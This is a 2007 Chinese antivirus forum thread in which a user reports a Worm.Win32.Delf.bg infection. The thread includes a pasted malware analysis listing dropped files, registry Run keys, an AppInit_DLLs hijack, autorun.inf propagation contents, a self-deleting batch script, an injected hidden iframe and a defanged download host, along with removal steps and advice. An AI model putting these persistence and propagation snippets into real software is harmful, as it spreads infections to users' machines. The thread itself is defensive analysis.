标题:
发现一不不能根除的病毒
[打印本页]
作者:
丛林猎人
时间:
2007-3-21 23:41
标题:
发现一不不能根除的病毒
不定时弹出下面的窗口。及时电脑无打开新网站时。
删除后。不久就又弹出来。看来这个病毒微点去不了根
附件 1:
000.JPG
(2007-3-21 23:41, 19.83 K,下载次数: 46)
作者:
Legend
时间:
2007-3-21 23:57
请楼主将该文件发到
virus@micropoint.com.cn
上,我们具体分析测试一下,谢谢楼主的反馈.
作者:
xi2008wang
时间:
2007-3-22 00:02
应该是没完全打系统补丁吧,
作者:
Legend
时间:
2007-3-22 09:13
楼主的情况请把您的微点软件安装目录下的mp6目录导出压缩一并发送
作者:
wg2250
时间:
2007-3-22 16:37
路过,支持一下
作者:
丛林猎人
时间:
2007-3-22 19:20
此病毒已经感染多个文件。为了试验点点,最近把瑞星监控关了。结果现在重新开瑞星时。瑞星监控程序也被感染损坏,升级过程也不停被感染,瑞星报为Worm.Delf.dy
c盘的_.de没找到过。别的能找出来。得会给你们压缩上报。
另,本系统没打算常用。进来的补丁没打。
作者:
丛林猎人
时间:
2007-3-22 19:40
遭了。遭大了。已经感染了所以exe文件。而且瑞星清除病毒后,被感染的文件均都被破坏。几百M的文件也只剩200多K。有的才几十k。。这下我可遭大了。苍天啊。
病毒名称:Worm.Win32.Delf.bg(Kaspersky)
病毒别名:Worm.MYGOD.a.30001(毒霸)
Worm.Delf.dy(瑞星)
病毒大小:18,432 字节(30,001 字节)
加壳方式:PE_Patch.UPX UPX
发现时间:2007.2
更新时间:2007.2.7
关联病毒:
传播方式:恶意网页、其它病毒下载,感染exe文件,可通过移动存储设备(U盘等)传播
该病毒运行后生成:
C:\WINDOWS\system\internat.exe (每隔一段时间收集非系统分区下exe文件写入win.log)
每个盘下生成autorun.inf和setup.exe
并感染非系统分区下的EXE文件!(大小:30986字节,此次被感染的文件没有被改变图标,没有生成_desktop.ini文件)
尝试网络:h**p://222.220.16.203/ccc 下载:
1.exe,2.exe,3.exe,4.exe,5.exe,6.exe,7.exe,8.exe,9.exe,10.exe并运行,
生成:
C:\WINDOWS\896588M.BMP
C:\WINDOWS\c0nime.exe
C:\WINDOWS\cmdbcs.exe
C:\WINDOWS\mppds.exe
C:\WINDOWS\msccrt.exe
C:\WINDOWS\wsttrs.exe
C:\WINDOWS\wsvs.exe
C:\WINDOWS\system\1.exe (调用arp,命令arp -d)
C:\WINDOWS\system\taskmgr.exe
C:\WINDOWS\system\CMD.DLL (打开的网页加入代码“<iframe src=h**p://a.d3a.us/1/ width=0 height=0 frameborder="0"></iframe>”
C:\WINDOWS\system\icedate.dat
C:\WINDOWS\system\IceHBO.dll (弹出广告:h**p://www.22595.com/sms.htm)
C:\WINDOWS\system\svchost.exe
C:\WINDOWS\system\WPC..DLL
C:\WINDOWS\system32\cmdbcs.dll
C:\WINDOWS\system32\Gjzos.dll
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\system32\wsttrs.dll
C:\WINDOWS\system32\wsvs.dll
C:\Documents and Settings\“你的用户名”\Local Settings\Temp\upxdnd.dll
C:\Documents and Settings\“你的用户名”\Local Settings\Temp\upxdnd.exe
添加注册表项:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"InternetEx"="C:\windows\system\1.exe"
"wsvs"="C:\windows\wsvs.exe"
"cmdbcs"="C:\windows\cmdbcs.exe"
"mppds"="C:\windows\mppds.exe"
"msccrt"="C:\windows\msccrt.exe"
"wsttrs"="C:\windows\wsttrs.exe"
"upxdnd"="C:\DOCUME~1\“你的用户名”\LOCALS~1\Temp\upxdnd.exe"
"Internet"="C:\windows\system\svchost.exe"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"1u0r68vrj"="C:\windows\c0nime.exe"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
"internet"="C:\windows\system\taskmgr.exe /scan"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
"AppInit_DLLs"="896588M.BMP" (原 "AppInit_DLLs"="" )
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID和HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
添加 {492B8F66-B8CF-4F7A-B0EE-B7383B92F5BA} 指向 C:\WINDOWS\system\IceHBO.dll
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{492B8F66-B8CF-4F7A-B0EE-B7383B92F5BA}\
@=" "
使用批处理{原文件名}.bat删除自身原文件,{原文件名}.bat内容:
CODE:
:try
del "exe"
if exist "exe" goto try
del %0
向各分区目录复制副本,创建autorun.inf:
X:\setup.exe
X:\autorun.inf
autorun.inf内容:
CODE:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\打开(&O)\command=setup.exe
感染之后,每个盘的右击菜单不过加了自动播放,而且增加了一个打开,右击菜单里有两个打开
病毒感染除系统分区下的所有exe文件,使用dir命令收集非系统分区下的所有exe文件列表:
CODE:
dir *.exe /s /b >%Windows%\win.log
被感染文件运行后释放病毒体(大小30001字节)到C盘根目录并运行:
C:\_.de
%Windows%\system\internat.exe开关参数/update,尝试访问网络下载其它病毒或恶意程序,保存到以下位置并运行:
%Windows%\system\SYSTEM32.vxd(加密文件列表)
%Windows%\system\1.exe
%Windows%\system\2.exe
%Windows%\system\3.exe
%Windows%\system\4.exe
%Windows%\system\5.exe
%Windows%\system\6.exe
%Windows%\system\7.exe
%Windows%\system\8.exe
%Windows%\system\9.exe
%Windows%\system\10.exe
%Windows%\system\svchost.exe
病毒内发现有如下信息:
CODE:
MYGOD
this is the Rav get all path administrators
.....................卡巴 我恨你...............
清除步骤
==========
1. 结束病毒进程:
%Windows%\system\internat.exe
2. 删除病毒文件:
%Windows%\system\internat.exe
3. 通过文件夹树形结构目录进入分区根目录,删除病毒文件:
X:\setup.exe
X:\autorun.inf
4. 删除C盘根目录下的病毒文件(可能存在):
C:\_.de
5. 删除病毒下载的其它病毒或恶意程序(可能存在):
%Windows%\system\SYSTEM32.vxd
%Windows%\system\1.exe
%Windows%\system\2.exe
%Windows%\system\3.exe
%Windows%\system\4.exe
%Windows%\system\5.exe
%Windows%\system\6.exe
%Windows%\system\7.exe
%Windows%\system\8.exe
%Windows%\system\9.exe
%Windows%\system\10.exe
%Windows%\system\svchost.exe
作者:
Legend
时间:
2007-3-22 19:46
请将您的病毒样本发到
virus@micropoint.com.cn
上,我们具体分析测试
作者:
丛林猎人
时间:
2007-3-22 20:19
完了。受刺激了。C:\WINDOWS\win.log里面记录了所以被感染的exe文件。发现无一幸免啊。这个纯文本文件都103K了。大家说得多少文件吧 。惨了。关键是怎么修复那些被感染的exe文件啊。瑞星也修不了。清除病毒后exe全变为几十k了。仅存图标而已了。。网上查了会。都说没办法。死定了。
这种病毒。点点也是没办法吧。我要我的exe啊。
要不是为了试验微点。我也不会把瑞星监控禁止启动啊。这次惨大了。
Legend
我现在有事出去一下。一会给你们打包发送。希望电脑还能坚持到那个时候。
作者:
tophero911
时间:
2007-3-22 20:41
楼主以后试验病毒起码要开个影子系统,虚拟机,小哨兵之类的啊,当然看来一也没想常用这个系统哈。
作者:
pcjuju
时间:
2007-3-22 22:30
你先用这个专杀试试,先拯救你的系统再说,据说很不错。
萧心软件:
Worm.Win32.Delf.bg专杀
http://down.crfly.com/DownLoadSF0000000169.aspx
作者:
天道酬勤
时间:
2007-3-22 22:35
楼主看看微点的程序生成日志,还有安全日志也发上来看看哈,确认是在安装微点后中的微点没防住。
作者:
丛林猎人
时间:
2007-3-23 23:33
Quote:
Originally posted by
pcjuju
at 2007-3-22 22:30:
你先用这个专杀试试,先拯救你的系统再说,据说很不错。
萧心软件:
Worm.Win32.Delf.bg专杀
http://down.crfly.com/DownLoadSF0000000169.aspx
谢谢。多亏这款工具了。农夫出品的就是好使啊。(还是有点小bug)总算挽救了大量的exe文件。
今天收到微点的回信。只是说了样本的确有问题。微点也报警了。并附图。但是根除这个病毒的办法没有设计。当然我没法捕捉到更上级的样本。自毁型的。按说微点应该能堵住这类病毒的进路吧。
今天又杀一天。电脑给别人用查东西了。又中别的毒了。微点也有有反应的。也有落下的。结果导致系统几近崩溃。刚弄好。
瑞星 微点 360 windows优化大师一个都不能少,经验.百度搜出来的东西靠前的都是垃圾站点
欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/)
bbs.micropoint.com.cn
000.JPG (2007-3-21 23:41, 19.83 K,下载次数: 46)
